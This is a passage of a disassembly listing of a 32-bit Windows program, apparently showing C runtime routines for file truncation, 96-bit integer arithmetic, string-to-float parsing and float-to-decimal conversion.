; ---------------------------------------------------------------------------
loc_42117E: ; CODE XREF: sub_4210E8+48�j
push [ebp+arg_0]
loc_421181: ; CODE XREF: sub_4210E8+AB�j
push 0
push edi
call sub_417330
add esp, 0Ch
loc_42118C: ; CODE XREF: sub_4210E8+7E�j
; sub_4210E8+87�j
mov eax, edi
loc_42118E: ; CODE XREF: sub_4210E8+AF�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_421192: ; CODE XREF: sub_4210E8+69�j
push esi
jmp short loc_421181
; ---------------------------------------------------------------------------
loc_421195: ; CODE XREF: sub_4210E8+92�j
xor eax, eax
jmp short loc_42118E
sub_4210E8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41FAE7
loc_421199: ; CODE XREF: sub_41FAE7+E�j
push esi
push edi
push 3
xor edi, edi
pop esi
cmp ds:dword_4CECC0, esi
jle short loc_4211EC
loc_4211A8: ; CODE XREF: sub_41FAE7+1703�j
mov eax, ds:dword_4CDCB0
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4211E3
test byte ptr [eax+0Ch], 83h
jz short loc_4211C7
push eax
call sub_417900
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4211C7
inc edi
loc_4211C7: ; CODE XREF: sub_41FAE7+16D1�j
; sub_41FAE7+16DD�j
cmp esi, 14h
jl short loc_4211E3
mov eax, ds:dword_4CDCB0
push dword ptr [eax+esi*4]
call sub_417C3B
mov eax, ds:dword_4CDCB0
pop ecx
and dword ptr [eax+esi*4], 0
loc_4211E3: ; CODE XREF: sub_41FAE7+16CB�j
; sub_41FAE7+16E3�j
inc esi
cmp esi, ds:dword_4CECC0
jl short loc_4211A8
loc_4211EC: ; CODE XREF: sub_41FAE7+16BF�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_41FAE7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4211F1 proc near ; CODE XREF: sub_41FEC6+271�p
var_1000 = byte ptr -1000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_417B30
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
cmp ebx, ds:dword_4CEDE0
jnb loc_421326
mov eax, ebx
mov ecx, ebx
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4CECE0[eax*4]
test byte ptr [eax+ecx*8+4], 1
jz loc_421326
push 1
push esi
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_421330
push 2
push esi
push ebx
call sub_41E517
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz loc_421330
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_4212D3
push 1000h
lea eax, [ebp+var_1000]
push esi
push eax
call sub_417330
push 8000h
push ebx
call sub_421E2B
add esp, 14h
mov [ebp+arg_4], eax
loc_421287: ; CODE XREF: sub_4211F1+BD�j
mov eax, 1000h
cmp edi, eax
jge short loc_421292
mov eax, edi
loc_421292: ; CODE XREF: sub_4211F1+9D�j
push eax
lea eax, [ebp+var_1000]
push eax
push ebx
call sub_41ED97
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_4212B0
sub edi, eax
test edi, edi
jle short loc_4212C6
jmp short loc_421287
; ---------------------------------------------------------------------------
loc_4212B0: ; CODE XREF: sub_4211F1+B5�j
cmp ds:dword_4CD9B8, 5
jnz short loc_4212C3
mov ds:dword_4CD9B4, 0Dh
loc_4212C3: ; CODE XREF: sub_4211F1+C6�j
or esi, 0FFFFFFFFh
loc_4212C6: ; CODE XREF: sub_4211F1+BB�j
push [ebp+arg_4]
push ebx
call sub_421E2B
pop ecx
pop ecx
jmp short loc_421313
; ---------------------------------------------------------------------------
loc_4212D3: ; CODE XREF: sub_4211F1+71�j
jge short loc_421313
push 0
push [ebp+arg_4]
push ebx
call sub_41E517
push ebx
call sub_41FE32
add esp, 10h
push eax
call ds:dword_424010 ;; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, 0FFFFFFFFh
jnz short loc_421313
mov ds:dword_4CD9B4, 0Dh
call ds:dword_42408C ;; RtlGetLastWin32Error
mov ds:dword_4CD9B8, eax
loc_421313: ; CODE XREF: sub_4211F1+E0�j
; sub_4211F1:loc_4212D3�j ...
push 0
push [ebp+arg_0]
push ebx
call sub_41E517
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_421333
; ---------------------------------------------------------------------------
loc_421326: ; CODE XREF: sub_4211F1+1A�j
; sub_4211F1+36�j
mov ds:dword_4CD9B4, 9
loc_421330: ; CODE XREF: sub_4211F1+4E�j
; sub_4211F1+63�j
or eax, 0FFFFFFFFh
loc_421333: ; CODE XREF: sub_4211F1+133�j
pop esi
pop ebx
leave
retn
sub_4211F1 endp
; =============== S U B R O U T I N E =======================================
sub_421337 proc near ; CODE XREF: sub_420331+2B�p
; sub_420331+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
lea ecx, [edx+esi]
cmp ecx, edx
jb short loc_42134D
cmp ecx, esi
jnb short loc_421350
loc_42134D: ; CODE XREF: sub_421337+10�j
push 1
pop eax
loc_421350: ; CODE XREF: sub_421337+14�j
mov edx, [esp+4+arg_8]
pop esi
mov [edx], ecx
retn
sub_421337 endp
; =============== S U B R O U T I N E =======================================
sub_421358 proc near ; CODE XREF: sub_421411+40�p
; sub_421411+61�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_42138A
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_42138A
inc dword ptr [esi+8]
loc_42138A: ; CODE XREF: sub_421358+19�j
; sub_421358+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_421337
add esp, 0Ch
test eax, eax
jz short loc_4213A2
inc dword ptr [esi+8]
loc_4213A2: ; CODE XREF: sub_421358+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_421337
add esp, 0Ch
pop edi
pop esi
retn
sub_421358 endp
; =============== S U B R O U T I N E =======================================
sub_4213B6 proc near ; CODE XREF: sub_421411+30�p
; sub_421411+36�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov esi, [eax]
mov edi, [eax+4]
mov ecx, esi
add esi, esi
mov [eax], esi
lea esi, [edi+edi]
shr ecx, 1Fh
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
mov [eax+4], esi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+8], ecx
pop esi
retn
sub_4213B6 endp
; =============== S U B R O U T I N E =======================================
sub_4213E4 proc near ; CODE XREF: sub_4219A9+1C8�p
; sub_421EA1+17D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
push edi
mov edx, [eax+8]
mov ecx, [eax+4]
mov esi, edx
mov edi, ecx
shl esi, 1Fh
shr ecx, 1
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
shr edx, 1
or ecx, edi
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_4213E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421411 proc near ; CODE XREF: sub_4214D8+3CA�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
cmp eax, edx
push esi
mov [ebp+var_4], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_421485
push edi
mov [ebp+arg_8], eax
loc_421438: ; CODE XREF: sub_421411+6F�j
mov esi, ebx
lea edi, [ebp+var_10]
movsd
movsd
push ebx
movsd
call sub_4213B6
push ebx
call sub_4213B6
lea eax, [ebp+var_10]
push eax
push ebx
call sub_421358
push ebx
call sub_4213B6
mov eax, [ebp+arg_0]
and [ebp+var_C], 0
and [ebp+var_8], 0
movsx eax, byte ptr [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push ebx
call sub_421358
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_421438
xor edx, edx
pop edi
loc_421485: ; CODE XREF: sub_421411+21�j
; sub_421411+9F�j
cmp [ebx+8], edx
jnz short loc_4214B2
mov ecx, [ebx+4]
mov eax, ecx
shr eax, 10h
mov [ebx+8], eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
add [ebp+var_4], 0FFF0h
mov [ebx+4], esi
mov [ebx], eax
jmp short loc_421485
; ---------------------------------------------------------------------------
loc_4214B2: ; CODE XREF: sub_421411+77�j
mov esi, 8000h
loc_4214B7: ; CODE XREF: sub_421411+B9�j
test [ebx+8], esi
jnz short loc_4214CC
push ebx
call sub_4213B6
add [ebp+var_4], 0FFFFh
pop ecx
jmp short loc_4214B7
; ---------------------------------------------------------------------------
loc_4214CC: ; CODE XREF: sub_421411+A9�j
mov ax, word ptr [ebp+var_4]
pop esi
mov [ebx+0Ah], ax
pop ebx
leave
retn
sub_421411 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4214D8 proc near ; CODE XREF: sub_42067A+17�p
; sub_4206A7+17�p
var_5C = byte ptr -5Ch
var_45 = byte ptr -45h
var_40 = dword ptr -40h
var_3A = dword ptr -3Ah
var_36 = dword ptr -36h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 5Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_8]
lea eax, [ebp+var_5C]
push 1
mov [ebp+var_C], eax
xor eax, eax
pop edx
mov [ebp+var_28], eax
mov [ebp+var_18], edx
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_2C], eax
mov [ebp+var_30], eax
mov [ebp+var_1C], eax
mov [ebp+var_8], eax
mov [ebp+var_14], eax
mov [ebp+arg_8], edi
loc_421513: ; CODE XREF: sub_4214D8+52�j
mov cl, [edi]
cmp cl, 20h
jz short loc_421529
cmp cl, 9
jz short loc_421529
cmp cl, 0Ah
jz short loc_421529
cmp cl, 0Dh
jnz short loc_42152C
loc_421529: ; CODE XREF: sub_4214D8+40�j
; sub_4214D8+45�j ...
inc edi
jmp short loc_421513
; ---------------------------------------------------------------------------
loc_42152C: ; CODE XREF: sub_4214D8+4F�j
push 4
pop esi
loc_42152F: ; CODE XREF: sub_4214D8+AE�j
; sub_4214D8+B7�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_4217B2 ; default
; jumptable 0042153B case 10
jmp off_421979[eax*4] ; switch jump
loc_421542: ; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 0
jl short loc_421553
cmp bl, 39h
jg short loc_421553
loc_42154C: ; CODE XREF: sub_4214D8+C4�j
; sub_4214D8+118�j
push 3
jmp loc_421770
; ---------------------------------------------------------------------------
loc_421553: ; CODE XREF: sub_4214D8+6D�j
; sub_4214D8+72�j
cmp bl, ds:byte_433E80
jnz short loc_421562
loc_42155B: ; CODE XREF: sub_4214D8+124�j
push 5
jmp loc_4217A8
; ---------------------------------------------------------------------------
loc_421562: ; CODE XREF: sub_4214D8+81�j
movsx eax, bl
sub eax, 2Bh
jz short loc_421588
dec eax
dec eax
jz short loc_42157C
sub eax, 3
jnz loc_42184B
jmp loc_42160B
; ---------------------------------------------------------------------------
loc_42157C: ; CODE XREF: sub_4214D8+94�j
push 2
mov [ebp+var_28], 8000h
pop eax
jmp short loc_42152F
; ---------------------------------------------------------------------------
loc_421588: ; CODE XREF: sub_4214D8+90�j
and [ebp+var_28], 0
push 2
pop eax
jmp short loc_42152F
; ---------------------------------------------------------------------------
loc_421591: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 1
mov [ebp+var_10], edx
jl short loc_42159E
cmp bl, 39h
jle short loc_42154C
loc_42159E: ; CODE XREF: sub_4214D8+BF�j
cmp bl, ds:byte_433E80
jz loc_421666
cmp bl, 2Bh
jz short loc_4215E0
cmp bl, 2Dh
jz short loc_4215E0
cmp bl, 30h
jz short loc_42160B
loc_4215B9: ; CODE XREF: sub_4214D8+207�j
cmp bl, 43h
jle loc_42184B
cmp bl, 45h
jle short loc_4215D9
cmp bl, 63h
jle loc_42184B
cmp bl, 65h
jg loc_42184B
loc_4215D9: ; CODE XREF: sub_4214D8+ED�j
push 6
jmp loc_4217A8
; ---------------------------------------------------------------------------
loc_4215E0: ; CODE XREF: sub_4214D8+D5�j
; sub_4214D8+DA�j ...
dec edi
push 0Bh
jmp loc_4217A8
; ---------------------------------------------------------------------------
loc_4215E8: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 2
jl short loc_4215F6
cmp bl, 39h
jle loc_42154C
loc_4215F6: ; CODE XREF: sub_4214D8+113�j
cmp bl, ds:byte_433E80
jz loc_42155B
cmp bl, 30h
jnz loc_4217C0
loc_42160B: ; CODE XREF: sub_4214D8+9F�j
; sub_4214D8+DF�j
mov eax, edx
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_421612: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
mov [ebp+var_10], edx ; jumptable 0042153B case 3
loc_421615: ; CODE XREF: sub_4214D8+184�j
cmp ds:dword_433E7C, edx
jle short loc_42162E
movzx eax, bl
push esi
push eax
call sub_41A642
pop ecx
pop ecx
push 1
pop edx
jmp short loc_42163C
; ---------------------------------------------------------------------------
loc_42162E: ; CODE XREF: sub_4214D8+143�j
mov ecx, ds:off_433C70
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_42163C: ; CODE XREF: sub_4214D8+154�j
test eax, eax
jz short loc_42165E
cmp [ebp+var_4], 19h
jnb short loc_421656
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
mov [eax], bl
jmp short loc_421659
; ---------------------------------------------------------------------------
loc_421656: ; CODE XREF: sub_4214D8+16C�j
inc [ebp+var_8]
loc_421659: ; CODE XREF: sub_4214D8+17C�j
mov bl, [edi]
inc edi
jmp short loc_421615
; ---------------------------------------------------------------------------
loc_42165E: ; CODE XREF: sub_4214D8+166�j
cmp bl, ds:byte_433E80
jnz short loc_4216CD
loc_421666: ; CODE XREF: sub_4214D8+CC�j
mov eax, esi
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_42166D: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp [ebp+var_4], 0 ; jumptable 0042153B case 4
mov [ebp+var_10], edx
mov [ebp+var_24], edx
jnz short loc_421686
loc_421679: ; CODE XREF: sub_4214D8+1AC�j
cmp bl, 30h
jnz short loc_421686
dec [ebp+var_8]
mov bl, [edi]
inc edi
jmp short loc_421679
; ---------------------------------------------------------------------------
loc_421686: ; CODE XREF: sub_4214D8+19F�j
; sub_4214D8+1A4�j ...
cmp ds:dword_433E7C, edx
jle short loc_42169F
movzx eax, bl
push esi
push eax
call sub_41A642
pop ecx
pop ecx
push 1
pop edx
jmp short loc_4216AD
; ---------------------------------------------------------------------------
loc_42169F: ; CODE XREF: sub_4214D8+1B4�j
mov ecx, ds:off_433C70
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_4216AD: ; CODE XREF: sub_4214D8+1C5�j
test eax, eax
jz short loc_4216CD
cmp [ebp+var_4], 19h
jnb short loc_4216C8
mov eax, [ebp+var_C]
inc [ebp+var_4]
sub bl, 30h
inc [ebp+var_C]
dec [ebp+var_8]
mov [eax], bl
loc_4216C8: ; CODE XREF: sub_4214D8+1DD�j
mov bl, [edi]
inc edi
jmp short loc_421686
; ---------------------------------------------------------------------------
loc_4216CD: ; CODE XREF: sub_4214D8+18C�j
; sub_4214D8+1D7�j
cmp bl, 2Bh
jz loc_4215E0
cmp bl, 2Dh
jz loc_4215E0
jmp loc_4215B9
; ---------------------------------------------------------------------------
loc_4216E4: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp ds:dword_433E7C, edx ; jumptable 0042153B case 5
mov [ebp+var_24], edx
jle short loc_421700
movzx eax, bl
push esi
push eax
call sub_41A642
pop ecx
pop ecx
push 1
pop edx
jmp short loc_42170E
; ---------------------------------------------------------------------------
loc_421700: ; CODE XREF: sub_4214D8+215�j
mov ecx, ds:off_433C70
movzx eax, bl
mov al, [ecx+eax*2]
and eax, esi
loc_42170E: ; CODE XREF: sub_4214D8+226�j
test eax, eax
jz loc_4217C0
mov eax, esi
jmp short loc_421771
; ---------------------------------------------------------------------------
loc_42171A: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
lea ecx, [edi-2] ; jumptable 0042153B case 6
cmp bl, 31h
mov [ebp+arg_8], ecx
jl short loc_42172A
cmp bl, 39h
jle short loc_42176E
loc_42172A: ; CODE XREF: sub_4214D8+24B�j
movsx eax, bl
sub eax, 2Bh
jz short loc_4217A6
dec eax
dec eax
jz short loc_42179A
sub eax, 3
jnz loc_42184E
loc_42173F: ; CODE XREF: sub_4214D8+2A4�j
push 8
jmp short loc_4217A8
; ---------------------------------------------------------------------------
loc_421743: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
mov [ebp+var_20], edx ; jumptable 0042153B case 8
loc_421746: ; CODE XREF: sub_4214D8+276�j
cmp bl, 30h
jnz short loc_421750
mov bl, [edi]
inc edi
jmp short loc_421746
; ---------------------------------------------------------------------------
loc_421750: ; CODE XREF: sub_4214D8+271�j
cmp bl, 31h
jl loc_42184B
cmp bl, 39h
jg loc_42184B
jmp short loc_42176E
; ---------------------------------------------------------------------------
loc_421764: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp bl, 31h ; jumptable 0042153B case 7
jl short loc_421777
cmp bl, 39h
jg short loc_421777
loc_42176E: ; CODE XREF: sub_4214D8+250�j
; sub_4214D8+28A�j
push 9
loc_421770: ; CODE XREF: sub_4214D8+76�j
pop eax
loc_421771: ; CODE XREF: sub_4214D8+240�j
dec edi
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_421777: ; CODE XREF: sub_4214D8+28F�j
; sub_4214D8+294�j
cmp bl, 30h
jnz short loc_4217C0
jmp short loc_42173F
; ---------------------------------------------------------------------------
loc_42177E: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
cmp [ebp+arg_18], 0 ; jumptable 0042153B case 11
jz short loc_4217AE
movsx eax, bl
lea ecx, [edi-1]
sub eax, 2Bh
mov [ebp+arg_8], ecx
jz short loc_4217A6
dec eax
dec eax
jnz loc_42184E
loc_42179A: ; CODE XREF: sub_4214D8+25C�j
or [ebp+var_18], 0FFFFFFFFh
push 7
pop eax
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_4217A6: ; CODE XREF: sub_4214D8+258�j
; sub_4214D8+2B8�j
push 7
loc_4217A8: ; CODE XREF: sub_4214D8+85�j
; sub_4214D8+103�j ...
pop eax
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_4217AE: ; CODE XREF: sub_4214D8+2AA�j
push 0Ah
dec edi
pop eax
loc_4217B2: ; CODE XREF: sub_4214D8+5D�j
; sub_4214D8+63�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0042153B case 10
jz loc_421850
jmp loc_42152F
; ---------------------------------------------------------------------------
loc_4217C0: ; CODE XREF: sub_4214D8+12D�j
; sub_4214D8+238�j ...
mov edi, [ebp+arg_8]
jmp loc_421850
; ---------------------------------------------------------------------------
loc_4217C8: ; CODE XREF: sub_4214D8+63�j
; DATA XREF: _0:off_421979�o
mov [ebp+var_20], 1 ; jumptable 0042153B case 9
xor esi, esi
loc_4217D1: ; CODE XREF: sub_4214D8+339�j
cmp ds:dword_433E7C, 1
jle short loc_4217E9
movzx eax, bl
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_4217F8
; ---------------------------------------------------------------------------
loc_4217E9: ; CODE XREF: sub_4214D8+300�j
mov ecx, ds:off_433C70
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_4217F8: ; CODE XREF: sub_4214D8+30F�j
test eax, eax
jz short loc_421818
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_421813
mov bl, [edi]
inc edi
jmp short loc_4217D1
; ---------------------------------------------------------------------------
loc_421813: ; CODE XREF: sub_4214D8+334�j
mov esi, 1451h
loc_421818: ; CODE XREF: sub_4214D8+322�j
mov [ebp+var_1C], esi
loc_42181B: ; CODE XREF: sub_4214D8+371�j
cmp ds:dword_433E7C, 1
jle short loc_421833
movzx eax, bl
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_421842
; ---------------------------------------------------------------------------
loc_421833: ; CODE XREF: sub_4214D8+34A�j
mov ecx, ds:off_433C70
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 4
loc_421842: ; CODE XREF: sub_4214D8+359�j
test eax, eax
jz short loc_42184B
mov bl, [edi]
inc edi
jmp short loc_42181B
; ---------------------------------------------------------------------------
loc_42184B: ; CODE XREF: sub_4214D8+99�j
; sub_4214D8+E4�j ...
dec edi
jmp short loc_421850
; ---------------------------------------------------------------------------
loc_42184E: ; CODE XREF: sub_4214D8+261�j
; sub_4214D8+2BC�j
mov edi, ecx
loc_421850: ; CODE XREF: sub_4214D8+2DD�j
; sub_4214D8+2EB�j ...
mov eax, [ebp+arg_4]
cmp [ebp+var_10], 0
mov [eax], edi
jz loc_421938
push 18h
pop eax
cmp [ebp+var_4], eax
jbe short loc_42187C
cmp [ebp+var_45], 5
jl short loc_421870
inc [ebp+var_45]
loc_421870: ; CODE XREF: sub_4214D8+393�j
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
dec eax
inc [ebp+var_8]
jmp short loc_42187F
; ---------------------------------------------------------------------------
loc_42187C: ; CODE XREF: sub_4214D8+38D�j
mov eax, [ebp+var_C]
loc_42187F: ; CODE XREF: sub_4214D8+3A2�j
cmp [ebp+var_4], 0
jbe loc_42192E
loc_421889: ; CODE XREF: sub_4214D8+3BD�j
dec eax
cmp byte ptr [eax], 0
jnz short loc_421897
dec [ebp+var_4]
inc [ebp+var_8]
jmp short loc_421889
; ---------------------------------------------------------------------------
loc_421897: ; CODE XREF: sub_4214D8+3B5�j
lea eax, [ebp+var_40]
push eax
lea eax, [ebp+var_5C]
push [ebp+var_4]
push eax
call sub_421411
mov eax, [ebp+var_1C]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_18], ecx
jge short loc_4218B6
neg eax
loc_4218B6: ; CODE XREF: sub_4214D8+3DA�j
add eax, [ebp+var_8]
cmp [ebp+var_20], ecx
jnz short loc_4218C1
add eax, [ebp+arg_10]
loc_4218C1: ; CODE XREF: sub_4214D8+3E4�j
cmp [ebp+var_24], ecx
jnz short loc_4218C9
sub eax, [ebp+arg_14]
loc_4218C9: ; CODE XREF: sub_4214D8+3EC�j
cmp eax, 1450h
jle short loc_421900
mov [ebp+var_2C], 1
loc_4218D7: ; CODE XREF: sub_4214D8+436�j
mov ebx, [ebp+arg_8]
mov esi, [ebp+arg_8]
mov eax, [ebp+arg_8]
mov edx, [ebp+arg_8]
loc_4218E3: ; CODE XREF: sub_4214D8+454�j
; sub_4214D8+45E�j
cmp [ebp+var_2C], 0
jz short loc_421949
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_14], 2
jmp short loc_42195E
; ---------------------------------------------------------------------------
loc_421900: ; CODE XREF: sub_4214D8+3F6�j
cmp eax, 0FFFFEBB0h
jge short loc_421910
mov [ebp+var_30], 1
jmp short loc_4218D7
; ---------------------------------------------------------------------------
loc_421910: ; CODE XREF: sub_4214D8+42D�j
push [ebp+arg_C]
push eax
lea eax, [ebp+var_40]
push eax
call sub_4220C1
mov edx, [ebp+var_40]
mov ebx, [ebp+var_40+2]
mov esi, [ebp+var_3A]
mov eax, [ebp+var_36]
add esp, 0Ch
jmp short loc_4218E3
; ---------------------------------------------------------------------------
loc_42192E: ; CODE XREF: sub_4214D8+3AB�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
jmp short loc_4218E3
; ---------------------------------------------------------------------------
loc_421938: ; CODE XREF: sub_4214D8+381�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 4
jmp short loc_42195E
; ---------------------------------------------------------------------------
loc_421949: ; CODE XREF: sub_4214D8+40F�j
cmp [ebp+var_30], 0
jz short loc_42195E
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
mov [ebp+var_14], 1
loc_42195E: ; CODE XREF: sub_4214D8+426�j
; sub_4214D8+46F�j ...
mov ecx, [ebp+arg_0]
or eax, [ebp+var_28]
pop edi
mov [ecx+6], esi
mov [ecx+2], ebx
mov [ecx+0Ah], ax
mov eax, [ebp+var_14]
pop esi
mov [ecx], dx
pop ebx
leave
retn
sub_4214D8 endp
; ---------------------------------------------------------------------------
off_421979 dd offset loc_421542 ; DATA XREF: sub_4214D8+63�r
dd offset loc_421591 ; jump table for switch statement
dd offset loc_4215E8
dd offset loc_421612
dd offset loc_42166D
dd offset loc_4216E4
dd offset loc_42171A
dd offset loc_421764
dd offset loc_421743
dd offset loc_4217C8
dd offset loc_4217B2
dd offset loc_42177E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219A9 proc near ; CODE XREF: sub_42074B+2C�p
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = word ptr -10h
var_E = dword ptr -0Eh
var_A = dword ptr -0Ah
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov eax, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_14]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0CCh
mov [ebp+var_19], 0CCh
mov [ebp+var_18], 0CCh
mov [ebp+var_17], 0CCh
mov [ebp+var_16], 0CCh
mov [ebp+var_15], 0CCh
mov [ebp+var_14], 0CCh
mov [ebp+var_13], 0CCh
mov [ebp+var_12], 0FBh
mov [ebp+var_11], 3Fh
mov [ebp+var_4], 1
mov edx, eax
jz short loc_421A0B
mov byte ptr [ebx+2], 2Dh
jmp short loc_421A0F
; ---------------------------------------------------------------------------
loc_421A0B: ; CODE XREF: sub_4219A9+5A�j
mov byte ptr [ebx+2], 20h
loc_421A0F: ; CODE XREF: sub_4219A9+60�j
mov edi, [ebp+arg_4]
test dx, dx
jnz short loc_421A35
test edi, edi
jnz short loc_421A35
cmp [ebp+arg_0], edi
jnz short loc_421A35
loc_421A20: ; CODE XREF: sub_4219A9+181�j
and word ptr [ebx], 0
mov byte ptr [ebx+2], 20h
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
jmp loc_421C33
; ---------------------------------------------------------------------------
loc_421A35: ; CODE XREF: sub_4219A9+6C�j
; sub_4219A9+70�j ...
cmp dx, si
jnz short loc_421AB4
mov eax, 80000000h
mov word ptr [ebx], 1
cmp edi, eax
jnz short loc_421A4E
cmp [ebp+arg_0], 0
jz short loc_421A5D
loc_421A4E: ; CODE XREF: sub_4219A9+9D�j
test edi, 40000000h
jnz short loc_421A5D
push offset a1Snan ; "1#SNAN"
jmp short loc_421AA3
; ---------------------------------------------------------------------------
loc_421A5D: ; CODE XREF: sub_4219A9+A3�j
; sub_4219A9+AB�j
test cx, cx
jz short loc_421A77
cmp edi, 0C0000000h
jnz short loc_421A77
cmp [ebp+arg_0], 0
jnz short loc_421A9E
push offset a1Ind ; "1#IND"
jmp short loc_421A86
; ---------------------------------------------------------------------------
loc_421A77: ; CODE XREF: sub_4219A9+B7�j
; sub_4219A9+BF�j
cmp edi, eax
jnz short loc_421A9E
